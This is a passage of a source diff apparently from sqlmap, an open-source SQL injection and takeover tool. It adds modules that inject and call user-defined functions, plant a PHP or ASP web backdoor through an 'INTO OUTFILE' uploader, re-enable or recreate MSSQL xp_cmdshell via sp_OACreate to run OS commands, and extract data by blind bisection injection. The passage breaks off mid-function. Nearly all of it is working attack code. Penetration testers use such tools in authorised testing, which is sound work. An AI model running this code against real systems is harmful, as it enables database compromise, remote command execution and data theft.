+                logger.warn("invalid value, only digits are allowed")
+
+        for x in range(0, udfCount):
+            while True:
+                msg     = "what is the name of the UDF number %d? " % (x + 1)
+                udfName = readInput(msg)
+
+                if udfName:
+                    self.udfs[udfName] = {}
+                    break
+                else:
+                    logger.warn("you need to specify the name of the UDF")
+
+            if kb.dbms == "MySQL":
+                defaultType = "string"
+            elif kb.dbms == "PostgreSQL":
+                defaultType = "text"
+
+            self.udfs[udfName]["input"] = []
+
+            default = 1
+            msg     = "how many input parameters takes UDF "
+            msg    += "'%s'? (default: %d) " % (udfName, default)
+
+            while True:
+                parCount = readInput(msg, default=default)
+
+                if isinstance(parCount, str) and parCount.isdigit() and int(parCount) >= 0:
+                    parCount = int(parCount)
+                    break
+
+                elif isinstance(parCount, int):
+                    break
+
+                else:
+                    logger.warn("invalid value, only digits >= 0 are allowed")
+
+            for y in range(0, parCount):
+                msg     = "what is the data-type of input parameter "
+                msg    += "number %d? (default: %s) " % ((y + 1), defaultType)
+
+                while True:
+                    parType = readInput(msg, default=defaultType)
+
+                    if isinstance(parType, str) and parType.isdigit():
+                        logger.warn("you need to specify the data-type of the parameter")
+
+                    else:
+                        self.udfs[udfName]["input"].append(parType)
+                        break
+
+            msg  = "what is the data-type of the return "
+            msg += "value? (default: %s) " % defaultType
+
+            while True:
+                retType = readInput(msg, default=defaultType)
+
+                if isinstance(retType, str) and retType.isdigit():
+                    logger.warn("you need to specify the data-type of the return value")
+                else:
+                    self.udfs[udfName]["return"] = retType
+                    break
+
+        self.udfInjectCore(self.udfs)
+
+        msg    = "do you want to call your injected user-defined "
+        msg   += "functions now? [Y/n/q] "
+        choice = readInput(msg, default="Y")
+
+        if choice[0] not in ( "y", "Y" ):
+            self.cleanup(udfDict=self.udfs)
+            return
+
+        while True:
+            udfList = []
+            msg     = "which UDF do you want to call?"
+
+            for udf, inpRet in self.udfs.items():
+                udfList.append(udf)
+                msg += "\n[%d] %s" % (len(udfList), udf)
+
+            msg += "\n[q] Quit"
+
+            while True:
+                choice = readInput(msg)
+
+                if choice and choice[0] in ( "q", "Q" ):
+                    break
+                elif isinstance(choice, str) and choice.isdigit() and int(choice) > 0 and int(choice) <= len(udfList):
+                    choice = int(choice)
+                    break
+                elif isinstance(choice, int) and choice > 0 and choice <= len(udfList):
+                    break
+                else:
+                    warnMsg  = "invalid value, only digits >= 1 and "
+                    warnMsg += "<= %d are allowed" % len(udfList)
+                    logger.warn(warnMsg)
+
+            cmd       = ""
+            count     = 1
+            udfToCall = udfList[choice - 1]
+
+            for inp in self.udfs[udfToCall]["input"]:
+                msg  = "what is the value of the parameter number "
+                msg += "%d (data-type: %s)? " % (count, inp)
+
+                while True:
+                    parValue = readInput(msg)
+
+                    if parValue:
+                        if "int" not in inp and "bool" not in inp:
+                            parValue = "'%s'" % parValue
+
+                        cmd += "%s," % parValue
+
+                        break
+                    else:
+                        logger.warn("you need to specify the value of the parameter")
+
+                count += 1
+
+            cmd    = cmd[:-1]
+            msg    = "do you want to retrieve the return value of the "
+            msg   += "UDF? [Y/n] "
+            choice = readInput(msg, default="Y")
+
+            if choice[0] in ("y", "Y"):
+                output = self.udfEvalCmd(cmd, udfName=udfToCall)
+
+                if output:
+                    dumper.string("return value", output)
+                else:
+                    print "No return value"
+            else:
+                self.udfExecCmd(cmd, udfName=udfToCall, silent=True)
+
+            msg    = "do you want to call this or another injected UDF? [Y/n] "
+            choice = readInput(msg, default="Y")
+
+            if choice[0] not in ("y", "Y"):
+                break
+
+        self.cleanup(udfDict=self.udfs)
--- a/lib/takeover/upx.py
+++ b/lib/takeover/upx.py
@@ -0,0 +1,108 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import os
+import time
+
+from subprocess import PIPE
+from subprocess import STDOUT
+from subprocess import Popen as execute
+
+from lib.core.common import dataToStdout
+from lib.core.common import decloakToMkstemp
+from lib.core.common import pollProcess
+from lib.core.data import logger
+from lib.core.data import paths
+from lib.core.settings import PLATFORM
+
+class UPX:
+    """
+    This class defines methods to compress binary files with UPX (Ultimate
+    Packer for eXecutables).
+
+    Reference:
+    * http://upx.sourceforge.net    
+    """
+
+    def __initialize(self, srcFile, dstFile=None):
+        if "darwin" in PLATFORM:
+            self.__upxPath = "%s/upx/macosx/upx" % paths.SQLMAP_CONTRIB_PATH
+
+        elif "win" in PLATFORM:
+            self.__upxTempExe = decloakToMkstemp("%s\upx\windows\upx.exe_" % paths.SQLMAP_CONTRIB_PATH, suffix=".exe")
+            self.__upxPath = self.__upxTempExe.name
+            self.__upxTempExe.close() #needed for execution rights
+
+        elif "linux" in PLATFORM:
+            self.__upxPath = "%s/upx/linux/upx" % paths.SQLMAP_CONTRIB_PATH
+
+        else:
+            warnMsg  = "unsupported platform for the compression tool "
+            warnMsg += "(upx), sqlmap will continue anyway"
+            logger.warn(warnMsg)
+
+            self.__upxPath = "%s/upx/linux/upx" % paths.SQLMAP_CONTRIB_PATH
+
+        self.__upxCmd = "%s -9 -qq %s" % (self.__upxPath, srcFile)
+
+        if dstFile:
+            self.__upxCmd += " -o %s" % dstFile
+
+    def pack(self, srcFile, dstFile=None):
+        self.__initialize(srcFile, dstFile)
+
+        logger.debug("executing local command: %s" % self.__upxCmd)
+        process = execute(self.__upxCmd, shell=True, stdout=PIPE, stderr=STDOUT)
+        
+        dataToStdout("\r[%s] [INFO] compression in progress " % time.strftime("%X"))
+        pollProcess(process)
+        upxStdout, upxStderr = process.communicate()
+
+        if hasattr(self, '__upxTempExe'):
+            os.remove(self.__upxTempExe.name)
+
+        msg = "failed to compress the file"
+
+        if "NotCompressibleException" in upxStdout:
+            msg += " because you provided a Metasploit version above "
+            msg += "3.3-dev revision 6681. This will not inficiate "
+            msg += "the correct execution of sqlmap. It might "
+            msg += "only slow down a bit the execution"
+            logger.debug(msg)
+
+        elif upxStderr:
+            logger.warn(msg)
+
+        else:
+            return os.path.getsize(srcFile)
+
+        return None
+
+    def unpack(self, srcFile, dstFile=None):
+        pass
+
+    def verify(self, filePath):
+        pass
+
+upx = UPX()
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -0,0 +1,249 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import os
+import posixpath
+import re
+
+from extra.cloak.cloak import decloak
+from lib.core.agent import agent
+from lib.core.common import decloakToNamedTemporaryFile
+from lib.core.common import fileToStr
+from lib.core.common import getDirs
+from lib.core.common import getDocRoot
+from lib.core.common import ntToPosixSlashes
+from lib.core.common import isWindowsPath
+from lib.core.common import normalizePath
+from lib.core.common import posixToNtSlashes
+from lib.core.common import randomStr
+from lib.core.common import readInput
+from lib.core.convert import hexencode
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import paths
+from lib.core.exception import sqlmapUnsupportedDBMSException
+from lib.core.shell import autoCompletion
+from lib.request.connect import Connect as Request
+
+
+class Web:
+    """
+    This class defines web-oriented OS takeover functionalities for
+    plugins.
+    """
+
+    def __init__(self):
+        self.webApi         = None
+        self.webBaseUrl     = None
+        self.webBackdoorUrl = None
+        self.webUploaderUrl = None
+        self.webDirectory   = None
+
+    def webBackdoorRunCmd(self, cmd):
+        if self.webBackdoorUrl is None:
+            return
+
+        output = None
+
+        if not cmd:
+            cmd = conf.osCmd
+
+        cmdUrl  = "%s?cmd=%s" % (self.webBackdoorUrl, cmd)
+        page, _ = Request.getPage(url=cmdUrl, direct=True, silent=True)
+
+        if page is not None:
+            output = re.search("<pre>(.+?)</pre>", page, re.I | re.S)
+
+            if output:
+                output = output.group(1)
+
+        return output
+
+    def webFileUpload(self, fileToUpload, destFileName, directory):
+        inputFile = open(fileToUpload, "r")
+        retVal = self.__webFileStreamUpload(inputFile, destFileName, directory)
+        inputFile.close()
+        return retVal
+
+    def __webFileStreamUpload(self, stream, destFileName, directory):
+        stream.seek(0) #rewind        
+        if self.webApi in ("php", "asp"):
+            multipartParams = {
+                                "upload":    "1",
+                                "file":      stream,
+                                "uploadDir": directory,
+                              }
+
+            page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams, raise404=False)
+
+            if "File uploaded" not in page:
+                warnMsg  = "unable to upload the backdoor through "
+                warnMsg += "the uploader agent on '%s'" % directory
+                logger.warn(warnMsg)
+                return False
+            else:
+                return True
+
+        elif self.webApi == "jsp":
+            return False
+
+    def __webFileInject(self, fileContent, fileName, directory):
+        outFile     = posixpath.normpath("%s/%s" % (directory, fileName))
+        uplQuery    = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\') if kb.os == "Windows" else directory)
+        query       = " LIMIT 1 INTO OUTFILE '%s' " % outFile
+        query      += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
+        query       = agent.prefixQuery(" %s" % query)
+        query       = agent.postfixQuery(query)
+        payload     = agent.payload(newValue=query)
+        page        = Request.queryPage(payload)
+        return page
+
+    def webInit(self):
+        """
+        This method is used to write a web backdoor (agent) on a writable
+        remote directory within the web server document root.
+        """
+
+        if self.webBackdoorUrl is not None and self.webUploaderUrl is not None and self.webApi is not None:
+            return
+
+        self.checkDbmsOs()
+
+        infoMsg = "trying to upload the uploader agent"
+        logger.info(infoMsg)
+
+        message  = "which web application language does the web server "
+        message += "support?\n"
+        message += "[1] ASP%s\n" % (" (default)" if kb.os == "Windows" else "")
+        message += "[2] PHP%s\n" % ("" if kb.os == "Windows" else " (default)")
+        message += "[3] JSP"
+
+        while True:
+            choice = readInput(message, default="1" if kb.os == "Windows" else "2")
+
+            if not choice or choice == "2":
+                self.webApi = "php"
+                break
+
+            elif choice == "1":
+                self.webApi = "asp"
+                break
+
+            elif choice == "3":
+                errMsg  = "JSP web backdoor functionality is not yet "
+                errMsg += "implemented"
+                raise sqlmapUnsupportedDBMSException(errMsg)
+
+            elif not choice.isdigit():
+                logger.warn("invalid value, only digits are allowed")
+
+            elif int(choice) < 1 or int(choice) > 3:
+                logger.warn("invalid value, it must be 1 or 3")
+
+        kb.docRoot  = getDocRoot(self.webApi)
+        directories = getDirs(self.webApi)
+        directories = list(directories)
+        directories.sort()
+
+        backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
+        backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName)
+        originalBackdoorContent = backdoorContent = backdoorStream.read()
+        
+        uploaderName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
+        uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "uploader.%s_" % self.webApi))
+        
+        for directory in directories:
+            # Upload the uploader agent
+            self.__webFileInject(uploaderContent, uploaderName, directory)
+            
+            requestDir  = ntToPosixSlashes(directory).replace(ntToPosixSlashes(kb.docRoot), "/")
+            if isWindowsPath(requestDir):
+                requestDir = requestDir[2:]
+            requestDir  = normalizePath(requestDir)
+            
+            self.webBaseUrl     = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir)
+            self.webUploaderUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), uploaderName)
+            self.webUploaderUrl = ntToPosixSlashes(self.webUploaderUrl.replace("./", "/"))
+            uplPage, _  = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False)
+            
+            if "sqlmap file uploader" not in uplPage:
+                warnMsg  = "unable to upload the uploader "
+                warnMsg += "agent on '%s'" % directory
+                logger.warn(warnMsg)
+
+                continue
+
+            infoMsg  = "the uploader agent has been successfully uploaded "
+            infoMsg += "on '%s' ('%s')" % (directory, self.webUploaderUrl)
+            logger.info(infoMsg)
+            
+            if self.webApi == "asp":
+                runcmdName = "tmpe%s.exe" % randomStr(lowercase=True)
+                runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
+                match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
+
+                if match:
+                    backdoorDirectory = match.group(1)
+                else:
+                    continue
+
+                backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
+                backdoorStream.file.truncate()
+                backdoorStream.read()
+                backdoorStream.seek(0)
+                backdoorStream.write(backdoorContent)
+
+                if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
+                    self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
+                    self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip('/'), backdoorName)
+                    self.webDirectory = backdoorDirectory
+                else:
+                    continue
+
+            else:
+                if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
+                    warnMsg  = "backdoor hasn't been successfully uploaded "
+                    warnMsg += "with uploader probably because of permission "
+                    warnMsg += "issues."
+                    logger.warn(warnMsg)
+
+                    message  = "do you want to try the same method used "
+                    message += "for uploader? [y/N] "
+                    getOutput = readInput(message, default="N")
+
+                    if getOutput in ("y", "Y"):
+                        self.__webFileInject(backdoorContent, backdoorName, directory)
+                    else:
+                        continue
+
+                self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
+                self.webDirectory = directory
+                    
+            infoMsg  = "the backdoor has probably been successfully "
+            infoMsg += "uploaded on '%s', go with your browser " % self.webDirectory
+            infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl
+            logger.info(infoMsg)
+
+            break
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -0,0 +1,199 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+from lib.core.common import randomStr
+from lib.core.common import readInput
+from lib.core.convert import urlencode
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.exception import sqlmapUnsupportedFeatureException
+from lib.request import inject
+from lib.techniques.blind.timebased import timeUse
+
+class xp_cmdshell:
+    """
+    This class defines methods to deal with Microsoft SQL Server
+    xp_cmdshell extended procedure for plugins.
+    """
+
+    def __init__(self):
+        self.xpCmdshellStr = "master..xp_cmdshell"
+
+    def __xpCmdshellCreate(self):
+        cmd = ""
+
+        if kb.dbmsVersion[0] in ( "2005", "2008" ):
+            logger.debug("activating sp_OACreate")
+
+            cmd += "EXEC master..sp_configure 'show advanced options', 1; "
+            cmd += "RECONFIGURE WITH OVERRIDE; "
+            cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "
+            cmd += "RECONFIGURE WITH OVERRIDE; "
+            self.xpCmdshellExecCmd(cmd)
+
+        self.__randStr = randomStr(lowercase=True)
+
+        cmd += "declare @%s nvarchar(999); " % self.__randStr
+        cmd += "set @%s='" % self.__randStr
+        cmd += "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int "
+        cmd += "EXEC sp_OACreate ''WScript.Shell'', @ID OUT "
+        cmd += "EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 "
+        cmd += "EXEC sp_OADestroy @ID'; "
+        cmd += "EXEC master..sp_executesql @%s;" % self.__randStr
+
+        if kb.dbmsVersion[0] in ( "2005", "2008" ):
+            cmd += " RECONFIGURE WITH OVERRIDE;"
+
+        self.xpCmdshellExecCmd(cmd)
+
+    def __xpCmdshellConfigure2005(self, mode):
+        debugMsg  = "configuring xp_cmdshell using sp_configure "
+        debugMsg += "stored procedure"
+        logger.debug(debugMsg)
+
+        cmd  = "EXEC master..sp_configure 'show advanced options', 1; "
+        cmd += "RECONFIGURE WITH OVERRIDE; "
+        cmd += "EXEC master..sp_configure 'xp_cmdshell', %d " % mode
+        cmd += "RECONFIGURE WITH OVERRIDE; "
+        cmd += "EXEC sp_configure 'show advanced options', 0"
+
+        return cmd
+
+    def __xpCmdshellConfigure2000(self, mode):
+        debugMsg  = "configuring xp_cmdshell using sp_addextendedproc "
+        debugMsg += "stored procedure"
+        logger.debug(debugMsg)
+
+        if mode == 1:
+            cmd  = "EXEC master..sp_addextendedproc 'xp_cmdshell', "
+            cmd += "@dllname='xplog70.dll'"
+        else:
+            cmd = "EXEC master..sp_dropextendedproc xp_cmdshell"
+
+        return cmd
+
+    def __xpCmdshellConfigure(self, mode):
+        if kb.dbmsVersion[0] in ( "2005", "2008" ):
+            cmd = self.__xpCmdshellConfigure2005(mode)
+        else:
+            cmd = self.__xpCmdshellConfigure2000(mode)
+
+        self.xpCmdshellExecCmd(cmd)
+
+    def __xpCmdshellCheck(self):
+        query    = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))
+        duration = timeUse(query)
+
+        if duration >= conf.timeSec:
+            return True
+        else:
+            return False
+
+    def xpCmdshellForgeCmd(self, cmd):
+        forgedCmd = "EXEC %s '%s'" % (self.xpCmdshellStr, cmd)
+        forgedCmd = urlencode(forgedCmd, convall=True)
+
+        return forgedCmd
+
+    def xpCmdshellExecCmd(self, cmd, silent=False, forgeCmd=False):
+        if forgeCmd:
+            cmd = self.xpCmdshellForgeCmd(cmd)
+
+        inject.goStacked(cmd, silent)
+
+    def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
+        self.getRemoteTempPath()
+
+        tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
+        cmd     = self.xpCmdshellForgeCmd("%s > %s" % (cmd, tmpFile))
+
+        self.xpCmdshellExecCmd(cmd)
+
+        inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))
+
+        self.delRemoteFile(tmpFile)
+
+        output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, sort=False, firstChar=first, lastChar=last)
+        inject.goStacked("DELETE FROM %s" % self.cmdTblName)
+
+        if isinstance(output, (list, tuple)):
+            output = output[0]
+
+            if isinstance(output, (list, tuple)):
+                output = output[0]
+
+        return output
+
+    def xpCmdshellInit(self):
+        self.__xpCmdshellAvailable = False
+
+        infoMsg  = "checking if xp_cmdshell extended procedure is "
+        infoMsg += "available, wait.."
+        logger.info(infoMsg)
+
+        result = self.__xpCmdshellCheck()
+
+        if result:
+            logger.info("xp_cmdshell extended procedure is available")
+            self.__xpCmdshellAvailable = True
+
+        else:
+            message  = "xp_cmdshell extended procedure does not seem to "
+            message += "be available. Do you want sqlmap to try to "
+            message += "re-enable it? [Y/n] "
+            choice   = readInput(message, default="Y")
+
+            if not choice or choice in ("y", "Y"):
+                self.__xpCmdshellConfigure(1)
+
+                if self.__xpCmdshellCheck():
+                    logger.info("xp_cmdshell re-enabled successfully")
+                    self.__xpCmdshellAvailable = True
+
+                else:
+                    logger.warn("xp_cmdshell re-enabling failed")
+
+                    logger.info("creating xp_cmdshell with sp_OACreate")
+                    self.__xpCmdshellConfigure(0)
+                    self.__xpCmdshellCreate()
+
+                    if self.__xpCmdshellCheck():
+                        logger.info("xp_cmdshell created successfully")
+                        self.__xpCmdshellAvailable = True
+
+                    else:
+                        warnMsg  = "xp_cmdshell creation failed, probably "
+                        warnMsg += "because sp_OACreate is disabled"
+                        logger.warn(warnMsg)
+
+        if not self.__xpCmdshellAvailable:
+            errMsg = "unable to proceed without xp_cmdshell"
+            raise sqlmapUnsupportedFeatureException, errMsg
+
+        debugMsg  = "creating a support table to write commands standard "
+        debugMsg += "output to"
+        logger.debug(debugMsg)
+
+        self.createSupportTbl(self.cmdTblName, self.tblField, "varchar(8000)")
--- a/lib/techniques/init.py
+++ b/lib/techniques/init.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/lib/techniques/blind/init.py
+++ b/lib/techniques/blind/init.py
@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -0,0 +1,308 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import threading
+import time
+import traceback
+
+from lib.core.agent import agent
+from lib.core.common import dataToSessionFile
+from lib.core.common import dataToStdout
+from lib.core.common import getCharset
+from lib.core.common import replaceNewlineTabs
+from lib.core.common import safeStringFormat
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.exception import sqlmapConnectionException
+from lib.core.exception import sqlmapValueException
+from lib.core.exception import sqlmapThreadException
+from lib.core.exception import unhandledException
+from lib.core.progress import ProgressBar
+from lib.core.unescaper import unescaper
+from lib.request.connect import Connect as Request
+
+def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None):
+    """
+    Bisection algorithm that can be used to perform blind SQL injection
+    on an affected host
+    """
+
+    partialValue = ""
+    finalValue   = ""
+
+    asciiTbl = getCharset(charsetType)
+
+    if "LENGTH(" in expression or "LEN(" in expression:
+        firstChar = 0
+    elif conf.firstChar is not None and ( isinstance(conf.firstChar, int) or ( isinstance(conf.firstChar, str) and conf.firstChar.isdigit() ) ):
+        firstChar = int(conf.firstChar) - 1
+    elif firstChar is None:
+        firstChar = 0
+    elif ( isinstance(firstChar, str) and firstChar.isdigit() ) or isinstance(firstChar, int):
+        firstChar = int(firstChar) - 1
+
+    if "LENGTH(" in expression or "LEN(" in expression:
+        lastChar = 0
+    elif conf.lastChar is not None and ( isinstance(conf.lastChar, int) or ( isinstance(conf.lastChar, str) and conf.lastChar.isdigit() ) ):
+        lastChar = int(conf.lastChar)
+    elif lastChar in ( None, "0" ):
+        lastChar = 0
+    elif ( isinstance(lastChar, str) and lastChar.isdigit() ) or isinstance(lastChar, int):
+        lastChar = int(lastChar)
+
+    if kb.dbmsDetected:
+        _, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
+        nulledCastedField                = agent.nullAndCastField(fieldToCastStr)
+        expressionReplaced               = expression.replace(fieldToCastStr, nulledCastedField, 1)
+        expressionUnescaped              = unescaper.unescape(expressionReplaced)
+    else:
+        expressionUnescaped              = unescaper.unescape(expression)
+
+    debugMsg = "query: %s" % expressionUnescaped
+    logger.debug(debugMsg)
+
+    if length and not isinstance(length, int) and length.isdigit():
+        length = int(length)
+
+    if length == 0:
+        return 0, ""
+
+    if lastChar > 0 and length > ( lastChar - firstChar ):
+        length = ( lastChar - firstChar )
+
+    showEta    = conf.eta and isinstance(length, int)
+    numThreads = min(conf.threads, length)
+    threads    = []
+
+    if showEta:
+        progress = ProgressBar(maxValue=length)
+        progressTime = []
+
+    if numThreads is not None:
+        debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else ""))
+        logger.debug(debugMsg)
+
+    if conf.verbose >= 1 and not showEta:
+        if isinstance(length, int) and conf.threads > 1:
+            dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth)))
+            dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X"))
+        else:
+            dataToStdout("[%s] [INFO] retrieved: " % time.strftime("%X"))
+
+    queriesCount = [0]    # As list to deal with nested scoping rules
+
+    def getChar(idx, asciiTbl=asciiTbl):
+        maxValue = asciiTbl[len(asciiTbl)-1]
+        minValue = 0
+
+        while len(asciiTbl) != 1:
+            queriesCount[0] += 1
+            position      = (len(asciiTbl) / 2)
+            posValue      = asciiTbl[position]
+            forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
+            result        = Request.queryPage(forgedPayload)
+
+            if result:
+                minValue = posValue
+                asciiTbl = asciiTbl[position:]
+            else:
+                maxValue = posValue
+                asciiTbl = asciiTbl[:position]
+
+            if len(asciiTbl) == 1:
+                if maxValue == 1:
+                    return None
+                else:
+                    return chr(minValue + 1)
+
+    def etaProgressUpdate(charTime, index):
+        if len(progressTime) <= ( (length * 3) / 100 ):
+            eta = 0
+        else:
+            midTime = sum(progressTime) / len(progressTime)
+            midTimeWithLatest = (midTime + charTime) / 2
+            eta = midTimeWithLatest * (length - index) / conf.threads
+
+        progressTime.append(charTime)
+        progress.update(index)
+        progress.draw(eta)
+
+    if conf.threads > 1 and isinstance(length, int) and length > 1:
+        value   = [ None ] * length
+        index   = [ firstChar ]    # As list for python nested function scoping
+        idxlock = threading.Lock()
+        iolock  = threading.Lock()
+        conf.seqLock = threading.Lock()
+        conf.threadContinue = True
+
+        def downloadThread():
+            try:
+                while conf.threadContinue:
+                    idxlock.acquire()
+
+                    if index[0] >= length:
+                        idxlock.release()
+
+                        return
+
+                    index[0] += 1
+                    curidx = index[0]
+                    idxlock.release()
+
+                    if conf.threadContinue:
+                        charStart = time.time()
+                        val       = getChar(curidx)
+                        if val is None:
+                            raise sqlmapValueException, "failed to get character at index %d (expected %d total)" % (curidx, length)
+                    else:
+                        break
+
+                    value[curidx-1] = val
+
+                    if conf.threadContinue:
+                        if showEta:
+                            etaProgressUpdate(time.time() - charStart, index[0])
+                        elif conf.verbose >= 1:
+                            startCharIndex = 0
+                            endCharIndex = 0
+                            for i in xrange(length):
+                                if value[i] is not None:
+                                    endCharIndex = max(endCharIndex, i)
+                            output = ''
+                            if endCharIndex > conf.progressWidth:
+                                startCharIndex = endCharIndex - conf.progressWidth
+                            count = 0
+                            for i in xrange(startCharIndex, endCharIndex):
+                                output += '_' if value[i] is None else value[i]
+                            for i in xrange(length):
+                                count += 1 if value[i] is not None else 0
+                            if startCharIndex > 0:
+                                output = '..' + output[2:]
+                            if endCharIndex - startCharIndex == conf.progressWidth:
+                                output = output[:-2] + '..'
+                            output += '_' * (min(length, conf.progressWidth) - len(output))
+                            status = ' %d/%d (%d%s)' % (count, length, round(100.0*count/length), '%')
+                            output += status if count != length else " "*len(status)
+                            iolock.acquire()
+                            dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), output))
+                            iolock.release()
+
